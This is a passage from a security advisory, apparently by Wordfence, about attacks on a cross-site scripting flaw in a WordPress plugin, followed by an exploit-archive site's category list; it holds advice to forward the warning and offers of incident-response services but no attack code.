vulnerability by the Wordfence Firewall’s Built-in Cross-Site Scripting protection.<br /><br />However, if you have friends or colleagues running this plugin, please forward this advisory to them - while the current wave of attacks does not contain a malicious payload, the attacker behind this is targeting a large list of sites and has significant resources available to them, and it would be simple for them to update their exploit configuration with a viable malicious payload.<br /><br />If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.<br /><br />If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. <br /><br /></code></pre>
Archives
Categories
- All Exploits 4122
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow